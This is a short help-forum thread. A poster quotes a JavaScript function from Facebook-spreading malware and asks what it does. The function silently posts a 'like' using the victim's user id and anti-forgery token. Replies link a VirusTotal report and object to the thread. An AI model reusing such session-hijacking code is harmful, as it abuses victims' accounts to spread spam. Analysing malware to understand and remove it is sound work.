Hi all,

I’m trying to understand how this malware works. I know that the malware spread by posting fake video posts on the user’s wall and sends chat messages to the user’s friends containing link to the fake video posts. I’m curious about one of the functions within the malware’s script that utilizing facebook like (see below). Anyone can explains a bit what it does? Does the malware “like” the post that it just created on the user’s wall or it “like” all the posts it ever created?

I attached here also a “follow-tcp-flow” wireshark dump of the malware communication to its servers.

Thanks!
-lz

--------------excerpt--------------------------------
. function like(id) {
var xmlhttpa = new XMLHttpRequest();
xmlhttpa.onreadystatechange = function () {
if (xmlhttpa.readyState == 4) {}
};
var params = “like_action=true”;
params += “&ft_ent_identifier=” + id;
params += “&source=0&client_id=1355581664855%3A2475647505&ft[tn]=%3E%3D&ft[type]=20&nctr[_mod]=pagelet_timeline_recent”;
params += “&fan_origin=page_timeline”;
params += “&__user=” + uid();
params += “&__req=1e”;
params += “&__dyn=7n8amgAMCBClUlgDxqigHzy5xNei9w”;
params += “&__a=1”;
params += “&fb_dtsg=” + dtsg();
params += “&phstamp=165816689711057878203”;
xmlhttpa.open(“POST”, “/ajax/ufi/like.php”, true);
xmlhttpa.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);
xmlhttpa.send(params);
}

seems to be a redirector …based on what other AV call it
https://www.virustotal.com/nb/file/e8b13a1e94138398e996b53e8445e25003bcf73fc309cd88e760b1bbb53f2364/analysis/1422286519/

Personally I would say this shouldn’t be on the forums, even the viruses and worms sub-forum - as we aren’t in the business of explaining how viruses work, but the business of removing them.

For me it is a very strange point for a first post also.

I already have reported it to the moderators.
This should indeed not be on this webboard in my opinion.